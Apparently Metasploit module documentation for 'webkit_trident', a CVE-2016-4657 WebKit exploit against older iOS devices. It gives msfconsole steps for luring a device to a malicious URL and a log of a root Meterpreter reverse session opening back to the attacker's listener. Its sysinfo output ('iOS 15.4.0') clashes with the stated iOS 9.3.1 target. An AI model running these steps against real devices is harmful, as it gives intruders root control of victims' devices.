## Description

This module exploits a UAF vulnerability in WebKit's JavaScriptCore library, CVE-2016-4657.

## Vulnerable Application

The exploit should work on 32-bit or 64-bit devices running iOS 9.3.4 or earlier, though it has been tested so far on 64-bit devices running 9.3.1.

## Verification Steps

 * Start msfconsole
 * `use exploit/apple_ios/browser/webkit_trident`
 * `set LHOST` and `SRVHOST` as appropriate
 * exploit
 * Browse to the given URL with a vulnerable device from Safari
 * Note that the payload is specially created for this exploit, due to sandbox
   limitations that prevent spawning new processes.

## Scenarios

### 64bit (ME279NF/A) running iOS 9.3.1:

```
msf exploit(apple_ios/browser/webkit_trident) >
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Sent exploit (770048 bytes)
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[+] 192.168.0.101    webkit_trident - Target is vulnerable.
[*] Meterpreter session 1 opened (192.168.0.110:4444 -> 192.168.0.101:52467) at 2018-05-30 14:49:59 +0200

msf exploit(apple_ios/browser/webkit_trident) > sessions -l

Active sessions
===============

  Id  Name  Type                           Information                                   Connection
  --  ----  ----                           -----------                                   ----------
  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.0.101  192.168.0.110:4444 -> 192.168.0.101:52467 (192.168.0.101)

msf exploit(apple_ios/browser/webkit_trident) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.101
OS           : iPad4,4 (iOS 15.4.0)
Architecture : arm64
BuildTuple   : aarch64-iphone-darwin
Meterpreter  : aarch64/apple_ios
```
